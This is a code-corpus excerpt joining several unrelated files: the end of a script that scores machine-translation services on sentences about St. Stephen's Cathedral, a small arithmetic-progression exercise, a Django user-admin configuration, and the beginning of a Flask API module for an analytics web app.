"translation": "In the south tower there are a total of 13 bells, eleven of which form the main vent of St. Stephen's Cathedral",
"references": ["In the south tower there are a total of 13 bells, eleven of which make up the main bells of St. Stephen's Cathedral", "There are 13 bells located in the south tower, eleven of which form the main chime of St. Stephen's cathedral"]
},
{
"translation": "The Pummerin, the third largest freely ringing church bell in Europe, has been located in the north tower under a tower hood from the Renaissance period since 1957",
"references": ["The Pummerin, the third largest free-swinging rung church bell of Europe, is located in the north tower since 1957 beneath a dome from the Renaissance period", "The Pummerin, the third-largest free-swinging church bell in Europe, has been located in the north tower under a Renaissance-era tower dome since 1957"]
},
],
"SDL Machine Translation Cloud":
[
{
"translation": "St. Stephen's Cathedral (actually the cathedral and metropolitan church of St. Stephan and all Saints) on Vienna's Stephansplatz (inner city district) has been a cathedral church (seat of a cathedral chapter) since 1365, a cathedral (bishop's seat) since 1723 and a metropolitan church of the archbishop of Vienna since",
"references": ["St. Stephen's Cathedral (actually the Cathedral and Metropolitan Church of St. Stephen and all Saints) on Vienna's Stephansplatz (Innere Stadt district) has been a cathedral church since 1365, a cathedral (bishop's see) since 1469/1479 and the metropolitan church of the Archbishop of Vienna since 1723", "St. Stephen's Cathedral (actually Cathedral and Metropolitan Church of St. Stephen and all Saints) on Vienna's Stephansplatz (Inner City district) has been a cathedral church since 1365, a cathedral (bishop's seat) since 1469/1479 and metropolitan church of the Archbishop of Vienna since 1723"]
},
{
"translation": "The Roman Catholic cathedral, also known as Steffl for short by the Viennese, is considered Vienna's landmark and is sometimes called the Austrian National Shrine",
"references": ["The Roman Catholic cathedral, which is also called Steffl for short by the Viennese, is considered a landmark of Vienna and is also referred to as an Austrian national shrine", "The Roman Catholic cathedral, also called Steffl for short by the Viennese, is considered a landmark of Vienna and is sometimes also referred to as the Austrian national shrine"]
},
{
"translation": "St. Stephen, who is considered the first Christian martyr, is the name of St. Stephen",
"references": ["The namesake is Saint Stephen, who is said to have been the first Christian martyr", "Saint Stephen, who is considered to be the first Christian martyr, is the namesake of the cathedral"]
},
{
"translation": "The second Patrozinium is all Saints",
"references": ["The second patronal festival is All Saints' Day", "The second patronal festival is All Saints' Day"]
},
{
"translation": "The building is 107 meters long and 34 meters wide",
"references": ["The building is 107 meters long and 34 meters wide", "The building is 107 metres long and 34 metres wide"]
},
{
"translation": "The cathedral is one of the most important Gothic buildings in Austria",
"references": ["The cathedral is one of the most important Gothic buildings in Austria", "The cathedral is one of the most important Gothic buildings in Austria"]
},
{
"translation": "Parts of the late-Roman predecessor building from 1230/1263 to 1940 have still been preserved and form the west facade, flanked by the two heathen towers, which are about 65 meters high",
"references": ["Parts of the late Romanesque predecessor building dating back to 1230/40 until 1263 are still intact and make up the west facade, flanked by the two pagan towers which are around 65 meters tall", "Parts of the late Romanesque predecessor building from 1230/40 till 1263 are still intact and form the west facade, which is flanked by the two heathen towers that are approximately 65 metres high"]
},
{
"translation": "St. Stephen's Cathedral has four towers in total: The highest of 136.4 meters is the south tower, the north tower has not been completed and is only 68 meters high",
"references": ["In total, St. Stephen's Cathedral has four towers: With a height of 136.4 meters, the tallest is the south tower, the north tower was never finished and is only 68 meters high", "In total, St. Stephen's cathedral has four towers: The highest one being the south tower with a height of 136.4 metres, the north tower was not completed and is only 68 metres high"]
},
{
"translation": "In the former Austria-Hungary, no church was allowed to be built higher than the south tower of St. Stephen's Cathedral",
"references": ["In former Austro-Hungary no church was allowed to be built taller than the south tower of St. Stephen's Cathedral", "In the former Austro-Hungarian empire, no church was allowed to be built higher than the south tower of St. Stephen's Cathedral"]
},
{
"translation": "For example, the Mariana conception cathedral in Linz was built two meters lower",
"references": ["As an example, the Cathedral of the Immaculate Conception in Linz was built two meters lower", "For example, the New Cathedral in Linz was built two metres lower"]
},
{
"translation": "The South Tower is an architectural masterpiece of the time; despite its remarkable height, the foundation is less than four meters deep",
"references": ["The south tower is an architectural masterpiece of the time; in spite of its remarkable height the foundation is less than four meters deep", "The south tower is an architectural masterpiece of the time; despite its remarkable height, the foundation is less than four metres deep"]
},
{
"translation": "In the south tower there are a total of 13 bells, of which eleven form the main building of St. Stephen's Cathedral",
"references": ["In the south tower there are a total of 13 bells, eleven of which make up the main bells of St. Stephen's Cathedral", "There are 13 bells located in the south tower, eleven of which form the main chime of St. Stephen's cathedral"]
},
{
"translation": "The Pummerin, the third largest free-swinging church bell in Europe, has been located in the north tower under a tower from the Renaissance period since 1957",
"references": ["The Pummerin, the third largest free-swinging rung church bell of Europe, is located in the north tower since 1957 beneath a dome from the Renaissance period", "The Pummerin, the third-largest free-swinging church bell in Europe, has been located in the north tower under a Renaissance-era tower dome since 1957"]
},
],
"SYSTRAN Translate":
[
{
"translation": "The St. Stephen's Cathedral (actually the cathedral and metropolitan church of St. Stephen and all the saints) at the Stephansplatz in Vienna (Innere Stadt district) has been the cathedral church (seat of a cathedral chapter) since 1365, the cathedral (bishop's seat) since 1469/1479 and the metropolitan church of the archbishop of Vienna since 1723",
"references": ["St. Stephen's Cathedral (actually the Cathedral and Metropolitan Church of St. Stephen and all Saints) on Vienna's Stephansplatz (Innere Stadt district) has been a cathedral church since 1365, a cathedral (bishop's see) since 1469/1479 and the metropolitan church of the Archbishop of Vienna since 1723", "St. Stephen's Cathedral (actually Cathedral and Metropolitan Church of St. Stephen and all Saints) on Vienna's Stephansplatz (Inner City district) has been a cathedral church since 1365, a cathedral (bishop's seat) since 1469/1479 and metropolitan church of the Archbishop of Vienna since 1723"]
},
{
"translation": "The Roman Catholic Cathedral, also known as Steffl for short by the Viennese, is regarded as the landmark of Vienna and is sometimes also referred to as the Austrian national sanctuary",
"references": ["The Roman Catholic cathedral, which is also called Steffl for short by the Viennese, is considered a landmark of Vienna and is also referred to as an Austrian national shrine", "The Roman Catholic cathedral, also called Steffl for short by the Viennese, is considered a landmark of Vienna and is sometimes also referred to as the Austrian national shrine"]
},
{
"translation": "The name is given to St. Stephen, who is considered the first Christian martyr",
"references": ["The namesake is Saint Stephen, who is said to have been the first Christian martyr", "Saint Stephen, who is considered to be the first Christian martyr, is the namesake of the cathedral"]
},
{
"translation": "The second patrocinium is All Saints",
"references": ["The second patronal festival is All Saints' Day", "The second patronal festival is All Saints' Day"]
},
{
"translation": "The building is 107 meters long and 34 meters wide",
"references": ["The building is 107 meters long and 34 meters wide", "The building is 107 metres long and 34 metres wide"]
},
{
"translation": "The cathedral is one of the most important Gothic buildings in Austria",
"references": ["The cathedral is one of the most important Gothic buildings in Austria", "The cathedral is one of the most important Gothic buildings in Austria"]
},
{
"translation": "Parts of the late Romanesque predecessor building from 1230/40 to 1263 are still preserved and form the west facade, flanked by the two pagan towers, which are about 65 meters high",
"references": ["Parts of the late Romanesque predecessor building dating back to 1230/40 until 1263 are still intact and make up the west facade, flanked by the two pagan towers which are around 65 meters tall", "Parts of the late Romanesque predecessor building from 1230/40 till 1263 are still intact and form the west facade, which is flanked by the two heathen towers that are approximately 65 metres high"]
},
{
"translation": "The St. Stephen's Cathedral has four towers: At 136.4 meters the highest is the South Tower, the North Tower has not been completed and is only 68 meters high",
"references": ["In total, St. Stephen's Cathedral has four towers: With a height of 136.4 meters, the tallest is the south tower, the north tower was never finished and is only 68 meters high", "In total, St. Stephen's cathedral has four towers: The highest one being the south tower with a height of 136.4 metres, the north tower was not completed and is only 68 metres high"]
},
{
"translation": "In the former Austria-Hungary, no church was allowed to be built higher than the south tower of St. Stephen's Cathedral",
"references": ["In former Austro-Hungary no church was allowed to be built taller than the south tower of St. Stephen's Cathedral", "In the former Austro-Hungarian empire, no church was allowed to be built higher than the south tower of St. Stephen's Cathedral"]
},
{
"translation": "For example, the cathedral of St. Mary's Conception in Linz was built two meters lower",
"references": ["As an example, the Cathedral of the Immaculate Conception in Linz was built two meters lower", "For example, the New Cathedral in Linz was built two metres lower"]
},
{
"translation": "The South Tower is an architectural masterpiece of the time; Despite its remarkable height, the foundation is less than four meters deep",
"references": ["The south tower is an architectural masterpiece of the time; in spite of its remarkable height the foundation is less than four meters deep", "The south tower is an architectural masterpiece of the time; despite its remarkable height, the foundation is less than four metres deep"]
},
{
"translation": "In the south tower there are a total of 13 bells, eleven of which are the main bells of St. Stephen's Cathedral",
"references": ["In the south tower there are a total of 13 bells, eleven of which make up the main bells of St. Stephen's Cathedral", "There are 13 bells located in the south tower, eleven of which form the main chime of St. Stephen's cathedral"]
},
{
"translation": "The Pummerin, the third largest free-swinging church bell in Europe, has been located in the North Tower under a Renaissance tower hood since 1957",
"references": ["The Pummerin, the third largest free-swinging rung church bell of Europe, is located in the north tower since 1957 beneath a dome from the Renaissance period", "The Pummerin, the third-largest free-swinging church bell in Europe, has been located in the north tower under a Renaissance-era tower dome since 1957"]
},
],
"Watson Language Translator":
[
{
"translation": "The St. Stephen's Cathedral (Cathedral and Metropolitan Church of St. Stephan and all the saints) at Vienna's Stephansplatz (district of the inner city) has been the cathedral church (seat of a cathedral chapter) since 1365, since 1469/1479 cathedral (bishop's seat) and since 1723 Metropolitan Church of the Archbishop of Vienna",
"references": ["St. Stephen's Cathedral (actually the Cathedral and Metropolitan Church of St. Stephen and all Saints) on Vienna's Stephansplatz (Innere Stadt district) has been a cathedral church since 1365, a cathedral (bishop's see) since 1469/1479 and the metropolitan church of the Archbishop of Vienna since 1723", "St. Stephen's Cathedral (actually Cathedral and Metropolitan Church of St. Stephen and all Saints) on Vienna's Stephansplatz (Inner City district) has been a cathedral church since 1365, a cathedral (bishop's seat) since 1469/1479 and metropolitan church of the Archbishop of Vienna since 1723"]
},
{
"translation": "The Roman Catholic Cathedral, also known as Steffl, is known as the landmark of Vienna and is sometimes referred to as the Austrian national sanctuary",
"references": ["The Roman Catholic cathedral, which is also called Steffl for short by the Viennese, is considered a landmark of Vienna and is also referred to as an Austrian national shrine", "The Roman Catholic cathedral, also called Steffl for short by the Viennese, is considered a landmark of Vienna and is sometimes also referred to as the Austrian national shrine"]
},
{
"translation": "Its name is Saint Stephen, who is the first Christian martyr to be a martyr",
"references": ["The namesake is Saint Stephen, who is said to have been the first Christian martyr", "Saint Stephen, who is considered to be the first Christian martyr, is the namesake of the cathedral"]
},
{
"translation": "The second Patrozinium is All Saints",
"references": ["The second patronal festival is All Saints' Day", "The second patronal festival is All Saints' Day"]
},
{
"translation": "The building is 107 meters long and 34 meters wide",
"references": ["The building is 107 meters long and 34 meters wide", "The building is 107 metres long and 34 metres wide"]
},
{
"translation": "The cathedral is one of the most important gothic buildings in Austria",
"references": ["The cathedral is one of the most important Gothic buildings in Austria", "The cathedral is one of the most important Gothic buildings in Austria"]
},
{
"translation": "Parts of the late Romanesque predecessor building from 1230/40 to 1263 are still preserved and form the west facade, flanked by the two Heidenürmen, which are about 65 meters high",
"references": ["Parts of the late Romanesque predecessor building dating back to 1230/40 until 1263 are still intact and make up the west facade, flanked by the two pagan towers which are around 65 meters tall", "Parts of the late Romanesque predecessor building from 1230/40 till 1263 are still intact and form the west facade, which is flanked by the two heathen towers that are approximately 65 metres high"]
},
{
"translation": "In total, the St. Stephen's Cathedral has four towers: the highest with 136.4 meters is the south tower, the north tower has not been completed and is only 68 meters high",
"references": ["In total, St. Stephen's Cathedral has four towers: With a height of 136.4 meters, the tallest is the south tower, the north tower was never finished and is only 68 meters high", "In total, St. Stephen's cathedral has four towers: The highest one being the south tower with a height of 136.4 metres, the north tower was not completed and is only 68 metres high"]
},
{
"translation": "In the former Austria-Hungary, no church was allowed to be built higher than the south tower of St. Stephen's Cathedral",
"references": ["In former Austro-Hungary no church was allowed to be built taller than the south tower of St. Stephen's Cathedral", "In the former Austro-Hungarian empire, no church was allowed to be built higher than the south tower of St. Stephen's Cathedral"]
},
{
"translation": "For example, the Mariä-conception-Dom in Linz was built by two meters lower",
"references": ["As an example, the Cathedral of the Immaculate Conception in Linz was built two meters lower", "For example, the New Cathedral in Linz was built two metres lower"]
},
{
"translation": "The south tower is an architectural masterpiece of the time; in spite of its remarkable height, the foundation is less than four metres deep",
"references": ["The south tower is an architectural masterpiece of the time; in spite of its remarkable height the foundation is less than four meters deep", "The south tower is an architectural masterpiece of the time; despite its remarkable height, the foundation is less than four metres deep"]
},
{
"translation": "In the south tower there are a total of 13 bells, eleven of which form the main building of St. Stephen's Cathedral",
"references": ["In the south tower there are a total of 13 bells, eleven of which make up the main bells of St. Stephen's Cathedral", "There are 13 bells located in the south tower, eleven of which form the main chime of St. Stephen's cathedral"]
},
{
"translation": "The pummerin, the third largest free-swinging church bell in Europe, has been located in the north tower under a tower hood dating back to the Renaissance period since 1957",
"references": ["The Pummerin, the third largest free-swinging rung church bell of Europe, is located in the north tower since 1957 beneath a dome from the Renaissance period", "The Pummerin, the third-largest free-swinging church bell in Europe, has been located in the north tower under a Renaissance-era tower dome since 1957"]
},
],
"Yandex Translate":
[
{
"translation": "St. Stephen's Cathedral (actually Cathedral and Metropolitan Church of St. Stephen and All Saints) on Vienna's Stephansplatz (district Inner City) has been cathedral church (seat of a cathedral chapter) since 1365, cathedral (bishop's seat) since 1469/1479 and metropolitan church of the Archbishop of Vienna since 1723",
"references": ["St. Stephen's Cathedral (actually the Cathedral and Metropolitan Church of St. Stephen and all Saints) on Vienna's Stephansplatz (Innere Stadt district) has been a cathedral church since 1365, a cathedral (bishop's see) since 1469/1479 and the metropolitan church of the Archbishop of Vienna since 1723", "St. Stephen's Cathedral (actually Cathedral and Metropolitan Church of St. Stephen and all Saints) on Vienna's Stephansplatz (Inner City district) has been a cathedral church since 1365, a cathedral (bishop's seat) since 1469/1479 and metropolitan church of the Archbishop of Vienna since 1723"]
},
{
"translation": "The Roman Catholic Cathedral, also called Steffl for short by the Viennese, is considered a landmark of Vienna and is sometimes also referred to as the Austrian national shrine",
"references": ["The Roman Catholic cathedral, which is also called Steffl for short by the Viennese, is considered a landmark of Vienna and is also referred to as an Austrian national shrine", "The Roman Catholic cathedral, also called Steffl for short by the Viennese, is considered a landmark of Vienna and is sometimes also referred to as the Austrian national shrine"]
},
{
"translation": "It is named after Saint Stephen, who is considered the first Christian martyr",
"references": ["The namesake is Saint Stephen, who is said to have been the first Christian martyr", "Saint Stephen, who is considered to be the first Christian martyr, is the namesake of the cathedral"]
},
{
"translation": "The second patrocinium is All Saints ' Day",
"references": ["The second patronal festival is All Saints' Day", "The second patronal festival is All Saints' Day"]
},
{
"translation": "The building is 107 meters long and 34 meters wide",
"references": ["The building is 107 meters long and 34 meters wide", "The building is 107 metres long and 34 metres wide"]
},
{
"translation": "The cathedral is one of the most important Gothic buildings in Austria",
"references": ["The cathedral is one of the most important Gothic buildings in Austria", "The cathedral is one of the most important Gothic buildings in Austria"]
},
{
"translation": "Parts of the Late Romanesque predecessor building from 1230/40 to 1263 are still preserved and form the western facade, flanked by the two pagan towers, which are about 65 meters high",
"references": ["Parts of the late Romanesque predecessor building dating back to 1230/40 until 1263 are still intact and make up the west facade, flanked by the two pagan towers which are around 65 meters tall", "Parts of the late Romanesque predecessor building from 1230/40 till 1263 are still intact and form the west facade, which is flanked by the two heathen towers that are approximately 65 metres high"]
},
{
"translation": "In total, St. Stephen's Cathedral has four towers: the tallest with 136.4 meters is the south Tower, the north tower has not been completed and is only 68 meters high",
"references": ["In total, St. Stephen's Cathedral has four towers: With a height of 136.4 meters, the tallest is the south tower, the north tower was never finished and is only 68 meters high", "In total, St. Stephen's cathedral has four towers: The highest one being the south tower with a height of 136.4 metres, the north tower was not completed and is only 68 metres high"]
},
{
"translation": "In the former Austria-Hungary, no church was allowed to be built higher than the south tower of St. Stephen's Cathedral",
"references": ["In former Austro-Hungary no church was allowed to be built taller than the south tower of St. Stephen's Cathedral", "In the former Austro-Hungarian empire, no church was allowed to be built higher than the south tower of St. Stephen's Cathedral"]
},
{
"translation": "For example, the Cathedral of the Conception of the Virgin Mary in Linz was built two metres lower",
"references": ["As an example, the Cathedral of the Immaculate Conception in Linz was built two meters lower", "For example, the New Cathedral in Linz was built two metres lower"]
},
{
"translation": "The south Tower is an architectural masterpiece of the time; despite its remarkable height, the foundation is less than four meters deep",
"references": ["The south tower is an architectural masterpiece of the time; in spite of its remarkable height the foundation is less than four meters deep", "The south tower is an architectural masterpiece of the time; despite its remarkable height, the foundation is less than four metres deep"]
},
{
"translation": "In the south tower there are a total of 13 bells, eleven of which form the main ringing of St. Stephen's Cathedral",
"references": ["In the south tower there are a total of 13 bells, eleven of which make up the main bells of St. Stephen's Cathedral", "There are 13 bells located in the south tower, eleven of which form the main chime of St. Stephen's cathedral"]
},
{
"translation": "The Pummerin, the third largest free-swinging church bell in Europe, has been located in the North Tower under a Renaissance-era tower hood since 1957",
"references": ["The Pummerin, the third largest free-swinging rung church bell of Europe, is located in the north tower since 1957 beneath a dome from the Renaissance period", "The Pummerin, the third-largest free-swinging church bell in Europe, has been located in the north tower under a Renaissance-era tower dome since 1957"]
},
],
}
# Keep an untokenized copy for METEOR, which is fed raw strings below,
# then tokenize the working copy in place for the token-based metrics.
translations2 = deepcopy(translations)
for translation in translations:
    for sentence in translations[translation]:
        # Pad sentence-internal periods so they become separate tokens,
        # e.g. "St. Stephen" -> ['St', '.', 'Stephen'].
        sentence["translation"] = sentence["translation"].replace(".", " . ").split()
        for idx, reference in enumerate(sentence["references"]):
            sentence["references"][idx] = reference.replace(".", " . ").split()
for service in translations:
    print(service)
    # Only the first two sentences of each service are scored here; the *_split
    # lists hold tokenized text, the plain lists hold the raw strings.
    hypotheses_split = [translations[service][0]["translation"], translations[service][1]["translation"]]
    references_split = [translations[service][0]["references"], translations[service][1]["references"]]
    hypotheses = [translations2[service][0]["translation"], translations2[service][1]["translation"]]
    references = [translations2[service][0]["references"], translations2[service][1]["references"]]
    # BLEU: n-gram precision with brevity penalty, 0 = bad, 1 = good
    print("BLEU: " + str(corpus_bleu(references_split, hypotheses_split)))
    # NIST: information-weighted n-gram precision, here with n-grams up to 3; higher is better
    print("NIST: " + str(corpus_nist(references_split, hypotheses_split, 3)))
    # METEOR: computed per sentence on the untokenized copies, then averaged
    avg_score = 0
    for idx, hypothesis in enumerate(hypotheses):
        avg_score += meteor_score(references[idx], hypothesis)
    avg_score /= len(hypotheses)
    print("METEOR: " + str(avg_score))
    # GLEU: Google-BLEU, 0 = bad, 1 = good
    print("GLEU: " + str(corpus_gleu(references_split, hypotheses_split)))
    # TER: translation edit rate, lower is better.
    # Transpose the references so refs_split[j] holds the j-th reference of every
    # sentence; all elements in references_split have to have the same length.
    refs_split = [[], []]
    for reference in references_split:
        for idx in range(len(reference)):
            refs_split[idx].append(reference[idx])
    avg_score = 0
    for ref in refs_split:
        for r, hyp in zip(ref, hypotheses_split):
            avg_score += ter(r, hyp)
    avg_score /= len(refs_split)
    avg_score /= len(hypotheses)
    print("TER: " + str(avg_score))
    # RIBES: rank-based word-order metric, 0 = bad, 1 = good
    print("RIBES: " + str(corpus_ribes(references_split, hypotheses_split)))
    # ChrF: character n-gram F-score, averaged over the single-reference corpora
    avg_score = 0
    for ref in refs_split:
        avg_score += corpus_chrf(ref, hypotheses_split)
    avg_score /= len(refs_split)
    print("ChrF: " + str(avg_score))
    print("")
| 97.846986 | 625 | 0.726634 |
a37d0692728b7b2bf7381bc45be509f6afdc4ea7
| 388 |
py
|
Python
|
Python/Exercícios_Python/052_progressão_aritmética.py
|
vdonoladev/aprendendo-programacao
|
83abbcd6701b2105903b28fd549738863418cfb8
|
[
"MIT"
] | null | null | null |
Python/Exercícios_Python/052_progressão_aritmética.py
|
vdonoladev/aprendendo-programacao
|
83abbcd6701b2105903b28fd549738863418cfb8
|
[
"MIT"
] | null | null | null |
Python/Exercícios_Python/052_progressão_aritmética.py
|
vdonoladev/aprendendo-programacao
|
83abbcd6701b2105903b28fd549738863418cfb8
|
[
"MIT"
] | null | null | null |
# -*- coding: utf-8 -*-
"""052 - Arithmetic Progression
Automatically generated by Colaboratory.
Original file is located at
    https://colab.research.google.com/drive/1XxsY2LOjklht2ABKc1B0VXPOppV9E7Dh
"""
num = int(input('\nEnter the first term of the arithmetic progression: '))
razão = int(input('Enter the common difference of the progression: '))
for c in range(1, 11):  # print the first 10 terms
    print(num, end=' ')
    num += razão
print('Done')
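# The loop above builds the terms iteratively. As a side note (a sketch, not
# part of the original exercise), the n-th term can also be computed directly
# from the closed form a_n = a_1 + (n - 1) * r:
def nth_term(first, diff, n):
    """Return the n-th term (1-indexed) of an arithmetic progression."""
    return first + (n - 1) * diff

# e.g. nth_term(2, 3, 10) == 29, the last value the loop prints for num=2, razão=3.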
| 25.866667 | 77 | 0.688144 |
289c9a1594a760f168991c2dc18e5e74ce3cfb9d
| 2,515 |
py
|
Python
|
apps/user/admin.py
|
OpenAdaptronik/Rattler
|
c3bdde0ca56b6d77f49bc830fa2b8bb41a26bae4
|
[
"MIT"
] | 2 |
2018-05-18T08:38:29.000Z
|
2018-05-22T08:26:09.000Z
|
apps/user/admin.py
|
IT-PM-OpenAdaptronik/Webapp
|
c3bdde0ca56b6d77f49bc830fa2b8bb41a26bae4
|
[
"MIT"
] | 118 |
2017-10-31T13:45:09.000Z
|
2018-02-24T20:51:42.000Z
|
apps/user/admin.py
|
OpenAdaptronik/Rattler
|
c3bdde0ca56b6d77f49bc830fa2b8bb41a26bae4
|
[
"MIT"
] | null | null | null |
""" License
MIT License
Copyright (c) 2017 OpenAdaptronik
Permission is hereby granted, free of charge, to any person obtaining a copy
of this software and associated documentation files (the "Software"), to deal
in the Software without restriction, including without limitation the rights
to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
copies of the Software, and to permit persons to whom the Software is
furnished to do so, subject to the following conditions:
The above copyright notice and this permission notice shall be included in all
copies or substantial portions of the Software.
THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
SOFTWARE.
"""
from django.contrib import admin
from django.contrib.auth import admin as auth_admin
from django.contrib.auth.models import Group
from django.utils.translation import gettext_lazy as _
from .models import User
# Unregister the default group admin model.
admin.site.unregister(Group)
@admin.register(User)
class UserAdmin(auth_admin.UserAdmin):
""" The user admin model.
Overwrites the default django.contrib.auth.admin.UserAdmin
Admin model to manipulate the users in the database.
Attributes:
See django.contrib.auth.models.AbstractUser.
fieldsets: The fieldset to show in the admin.
list_display: The data to show in the user list.
add_fieldsets: The data to show in the user creation.
"""
    # Filter function for the user in Profile/admin.py
fieldsets = (
(None, {'fields': ('username', 'email', 'password')}),
(_('permissions'), {'fields': ('is_active', 'is_superuser', 'is_staff')}),
(_('important dates'), {'fields': ('last_login', 'date_joined')}),
(_('name'), {'fields': ('last_name', 'first_name')}),
)
list_display = ('username', 'email', 'is_superuser','is_active', 'date_joined', 'last_login', )
list_filter = ('is_superuser', 'is_active')
add_fieldsets = (
(None, {
'classes': ('wide',),
'fields': ('username', 'email', 'password1', 'password2'),
}),
)
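# A hedged note on the configuration above: fieldsets controls the sections of
# the admin change form, list_display the columns of the user list view, and
# add_fieldsets the fields shown when creating a user; this mirrors the stock
# django.contrib.auth UserAdmin, only regrouped.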
| 34.930556 | 99 | 0.71332 |
95de10b35f36d0ae9b8107f3312c8a02cbd6a865
| 42,950 |
py
|
Python
|
src/visuanalytics/server/api/api.py
|
Biebertal-mach-mit-TV/Data-Analytics
|
70cda2393e61f7ca0a1a4a5965646e908bd0faa9
|
[
"MIT"
] | 1 |
2020-11-27T17:26:27.000Z
|
2020-11-27T17:26:27.000Z
|
src/visuanalytics/server/api/api.py
|
Biebertal-mach-mit-TV/Data-Analytics
|
70cda2393e61f7ca0a1a4a5965646e908bd0faa9
|
[
"MIT"
] | 85 |
2021-01-02T11:38:59.000Z
|
2021-07-26T07:13:47.000Z
|
src/visuanalytics/server/api/api.py
|
Biebertal-mach-mit-TV/Data-Analytics
|
70cda2393e61f7ca0a1a4a5965646e908bd0faa9
|
[
"MIT"
] | 1 |
2021-04-19T06:50:53.000Z
|
2021-04-19T06:50:53.000Z
|
"""
Contains the API endpoints.
On error, every endpoint returns a key 'err_msg'.
"""
import flask
import logging
from flask import (Blueprint, request, send_file, send_from_directory)
from werkzeug.utils import secure_filename
from os import path
from datetime import datetime
from visuanalytics.server.db import db, queries
from visuanalytics.analytics.processing.image.matplotlib.diagram import generate_test_diagram
from visuanalytics.util.resources import TEMP_LOCATION, get_resource_path, get_temp_path
from visuanalytics.util.config_manager import get_private, set_private
from ast2json import str2json
from base64 import b64encode
from visuanalytics.analytics.apis.checkapi import check_api
logger = logging.getLogger()
api = Blueprint('api', __name__)
@api.teardown_app_request
def close_db_con(exception):
db.close_con_f()
@api.route("/testdiagram", methods=["POST"])
def test_diagram():
"""
    Endpoint `/testdiagram`.
    Generates a test image with random values for a diagram.
    The submitted JSON should have the same structure as when creating an infoprovider.
    The response contains the generated image as a BLOB file.
"""
diagram_info = request.json
try:
file_path = generate_test_diagram(diagram_info)
return send_file(file_path, "application/json", True)
except Exception:
logger.exception("An error occurred: ")
err = flask.jsonify({"err_msg": "An error occurred while generating a test-diagram"})
return err, 400
@api.route("/checkapi", methods=["POST"])
def checkapi():
"""
    Endpoint `/checkapi`.
    The submitted JSON contains the API data with the keys 'url', 'api_key' and 'has_key'.
    The response contains all keys, and their types, that can be queried from the given API.
"""
api_info = request.json
try:
if "api_info" not in api_info:
err = flask.jsonify({"err_msg": "Missing field 'api'"})
return err, 400
if "api_key_name" not in api_info["api_info"]:
err = flask.jsonify({"err_msg": "Missing API-Key"})
return err, 400
if "url_pattern" not in api_info["api_info"]:
err = flask.jsonify({"err_msg": "Missing URL"})
return err, 400
if "method" not in api_info:
err = flask.jsonify({"err_msg": "Missing Field 'method'"})
return err, 400
if "response_type" not in api_info:
err = flask.jsonify({"err_msg": "Missing field 'response_type'"})
return err, 400
header, parameter = queries.generate_request_dicts(api_info["api_info"], api_info["method"])
url, params = queries.update_url_pattern(api_info["api_info"]["url_pattern"])
parameter.update(params)
req_data = {
"method": api_info["api_info"].get("method", "get"),
"url": url,
"headers": header,
"params": parameter,
"response_type": api_info["response_type"]
}
keys, success = check_api(req_data)
return flask.jsonify({"status": 0, "api_keys": keys}) if success else flask.jsonify({"status": 1, "api_keys": keys})
except Exception:
logger.exception("An error occurred: ")
err = flask.jsonify({"err_msg": "An error occurred while checking a new api"})
return err, 400
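# A hedged example body for POST /checkapi (all values are hypothetical; the
# required keys follow from the checks above):
# {
#     "api_info": {"api_key_name": "", "url_pattern": "https://example.com/data"},
#     "method": "noAuth",
#     "response_type": "json"
# }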
@api.route("/infoprovider", methods=["POST"])
def add_infoprovider():
"""
    Endpoint `/infoprovider`.
    Route for adding an infoprovider.
    The transmitted infoprovider must contain the keys 'infoprovider_name', 'diagrams', 'diagrams_original' as well
    as a key 'datasources' holding all datasources.
"""
infoprovider = request.json
try:
if "infoprovider_name" not in infoprovider:
err = flask.jsonify({"err_msg": "Missing Infoprovider-Name"})
return err, 400
if "datasources" not in infoprovider:
err = flask.jsonify({"err_msg": "Missing Datasources"})
return err, 400
if "diagrams" not in infoprovider:
err = flask.jsonify({"err_msg": "Missing field 'diagrams'"})
return err, 400
if "diagrams_original" not in infoprovider:
err = flask.jsonify({"err_msg": "Missing field 'diagrams_original'"})
return err, 400
        for datasource in infoprovider["datasources"]:
            if "datasource_name" not in datasource:
                err = flask.jsonify({"err_msg": "Missing field 'datasource_name' in a datasource"})
                return err, 400
            if "api" not in datasource:
                err = flask.jsonify({"err_msg": f"Missing field 'api' in datasource {datasource['datasource_name']}"})
                return err, 400
            if "transform" not in datasource:
                err = flask.jsonify({"err_msg": f"Missing field 'transform' in datasource {datasource['datasource_name']}"})
                return err, 400
            if "calculates" not in datasource:
                err = flask.jsonify({"err_msg": f"Missing field 'calculates' for datasource {datasource['datasource_name']}"})
                return err, 400
            if "replacements" not in datasource:
                err = flask.jsonify({"err_msg": f"Missing field 'replacements' for datasource {datasource['datasource_name']}"})
                return err, 400
            if "storing" not in datasource:
                err = flask.jsonify({"err_msg": f"Missing field 'storing' in datasource {datasource['datasource_name']}"})
                return err, 400
            if "historized_data" not in datasource:
                err = flask.jsonify({"err_msg": f"Missing field 'historized_data' for datasource {datasource['datasource_name']}"})
                return err, 400
            if "formulas" not in datasource:
                err = flask.jsonify({"err_msg": f"Missing field 'formulas' in datasource {datasource['datasource_name']}"})
                return err, 400
            if "schedule" not in datasource:
                err = flask.jsonify({"err_msg": f"Missing field 'schedule' for datasource {datasource['datasource_name']}"})
                return err, 400
            if "listItems" not in datasource:
                err = flask.jsonify({"err_msg": f"Missing field 'listItems' for datasource {datasource['datasource_name']}"})
                return err, 400
if not queries.insert_infoprovider(infoprovider):
err = flask.jsonify({"err_msg": f"There already exists an infoprovider with the name "
f"{infoprovider['infoprovider_name']}"})
return err, 400
return "", 204
except Exception:
logger.exception("An error occurred: ")
err = flask.jsonify({"err_msg": "An error occurred while adding an infoprovider"})
return err, 400
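# A hedged minimal payload for POST /infoprovider (all values are hypothetical;
# the required keys follow from the checks above):
# {
#     "infoprovider_name": "example",
#     "diagrams": {},
#     "diagrams_original": {},
#     "datasources": [{
#         "datasource_name": "source1", "api": {}, "transform": [],
#         "calculates": [], "replacements": [], "storing": [],
#         "historized_data": [], "formulas": [], "schedule": {},
#         "listItems": []
#     }]
# }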
@api.route("/videojob", methods=["POST"])
def add_videojob():
"""
    Endpoint `/videojob`.
    Route for adding a video job.
